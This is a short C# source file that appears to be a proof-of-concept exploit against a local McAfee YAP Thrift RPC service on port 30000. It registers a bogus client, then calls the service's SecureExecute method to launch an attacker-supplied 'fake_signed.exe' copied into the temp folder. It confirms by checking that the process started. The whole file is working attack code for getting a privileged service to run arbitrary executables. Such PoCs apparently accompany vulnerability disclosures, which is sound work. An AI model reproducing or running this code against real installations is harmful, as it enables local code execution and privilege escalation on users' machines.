﻿using McAfee.YAP.Service.RPC;
using System;
using System.Diagnostics;
using System.IO;
using Thrift.Protocol;
using Thrift.Transport;

namespace SecureExecutePoc
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                YAPClient yap = new YAPClient();
                yap.ClientName = "Hello";
                yap.FaceTemplate = new byte[0];
                yap.LearnedFaceAttestation = string.Empty;
                yap.LearnedFaceData = string.Empty;
                yap.Type = YAPClientType.YAP_DESKTOP_CLIENT;
                yap.WindowsUserId = "User";
                var socket = new TSocket("127.0.0.1", 30000);
                socket.Open();
                yap.Port = 30000;
                YAPServiceAPI.Client api = new YAPServiceAPI.Client(new TBinaryProtocol(socket));
                int client_id = api.RegisterClient(yap);
                Console.WriteLine("Client_ID: {0}", client_id);
                string base_path = Path.GetDirectoryName(typeof(Program).Assembly.Location);
                string exe_path = Path.Combine(base_path, "fake_signed.exe");
                string dest_path = Path.GetTempFileName() + ".exe";
                File.Copy(exe_path, dest_path, true);
                Console.WriteLine(dest_path);
                api.SecureExecute(client_id, $@"{dest_path};Nothing");

                Process[] ps = Process.GetProcessesByName(Path.GetFileNameWithoutExtension(dest_path));
                if (ps.Length == 0)
                {
                    throw new ArgumentException("Can't find started process");
                }
                Console.WriteLine("Process started with PID: {0}", ps[0].Id);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
